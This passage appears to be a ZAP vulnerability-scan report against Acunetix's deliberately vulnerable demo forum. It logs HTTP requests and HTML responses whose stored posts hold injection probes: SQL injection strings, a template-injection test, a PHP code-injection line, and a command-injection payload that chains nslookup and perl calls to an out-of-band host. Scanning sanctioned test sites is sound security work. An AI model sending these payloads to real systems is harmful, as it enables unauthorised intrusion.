class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3074 |
Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>12345'"\'\");|]*</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3071 |
Response Body - size: 3,071 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>/\xfs.bxss.me</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3127 |
Response Body - size: 3,127 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 2+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 2+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 2+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3062 |
Response Body - size: 3,062 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>995022</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3115 |
Response Body - size: 3,115 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx{{98991*97996}}xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx{{98991*97996}}xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx{{98991*97996}}xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3082 |
Response Body - size: 3,082 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>";print(md5(31337));$a="</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3337 |
Response Body - size: 3,337 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")|(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")&(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3127 |
Response Body - size: 3,127 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> 